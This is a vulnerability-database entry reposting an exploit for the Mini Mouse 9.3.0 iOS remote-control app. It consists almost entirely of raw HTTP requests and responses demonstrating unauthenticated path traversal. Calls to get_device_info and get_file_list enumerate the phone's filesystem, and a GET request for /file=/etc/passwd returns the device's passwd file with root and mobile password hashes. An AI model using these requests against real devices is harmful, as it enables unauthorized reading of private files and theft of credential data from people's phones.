Wednesday, April 7, 2021

Mini Mouse 9.3.0 Local File Inclusion / Path Traversal

# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2

GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"uuid": "7E07125B-61BE-4F12-820C-FA706C445219",
"model": "iPhone",
"sys_name": "iOS",
"sys_version": "14.4.2",
"battery_state": 0,
"battery_level": -1,
"memery_total_size": 2983772160,
"device_name": "mobile",
"user_name": "iPhone",
"pwd": "",
"dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type": 3
}
}



-------------------------------------------------------------------------------------


POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "//usr",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "usr",
"name_display": "usr",
"file_size": 288,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//bin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "bin",
"name_display": "bin",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//sbin",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "sbin",
"name_display": "sbin",
"file_size": 544,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.file",
"is_local": true,
"is_hide": true,
"is_floder": false,
"name": ".file",
"name_display": ".file",
"file_size": 0,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//etc",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "etc",
"name_display": "etc",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//System",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "System",
"name_display": "System",
"file_size": 128,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//var",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "var",
"name_display": "var",
"file_size": 11,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Library",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Library",
"name_display": "Library",
"file_size": 672,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//private",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "private",
"name_display": "private",
"file_size": 224,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//dev",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "dev",
"name_display": "dev",
"file_size": 1395,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.ba",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".ba",
"name_display": ".ba",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//.mb",
"is_local": true,
"is_hide": true,
"is_floder": true,
"name": ".mb",
"name_display": ".mb",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//tmp",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "tmp",
"name_display": "tmp",
"file_size": 15,
"create_time": 1577865.600000,
"update_time": 1577865.600000,
"sys_type": 3
}, {
"path": "//Applications",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Applications",
"name_display": "Applications",
"file_size": 3296,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//Developer",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Developer",
"name_display": "Developer",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}, {
"path": "//cores",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "cores",
"name_display": "cores",
"file_size": 64,
"create_time": 0,
"update_time": 0,
"sys_type": 3
}]
}
}

-------------------------
using the data found:
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download

POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101

{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1

{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "GDT",
"name_display": "GDT",
"file_size": 96,
"create_time": 1617228.400302,
"update_time": 1617228.400302,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local": true,
"is_hide": false,
"is_floder": false,
"name": "input_photo.jpg",
"name_display": "input_photo.jpg",
"file_size": 6141491,
"create_time": 1617583.738397,
"update_time": 1617583.738402,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Ico",
"name_display": "Ico",
"file_size": 64,
"create_time": 1617583.334913,
"update_time": 1617583.334913,
"sys_type": 3
}, {
"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local": true,
"is_hide": false,
"is_floder": true,
"name": "Download",
"name_display": "Download",
"file_size": 64,
"create_time": 1617228.371587,
"update_time": 1617228.371587,
"sys_type": 3
}]
}
}

----------------------------------------------------------------------

GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4

{}


HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018

##
# User Database
#
# This file is the authoritative user database.
##

nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated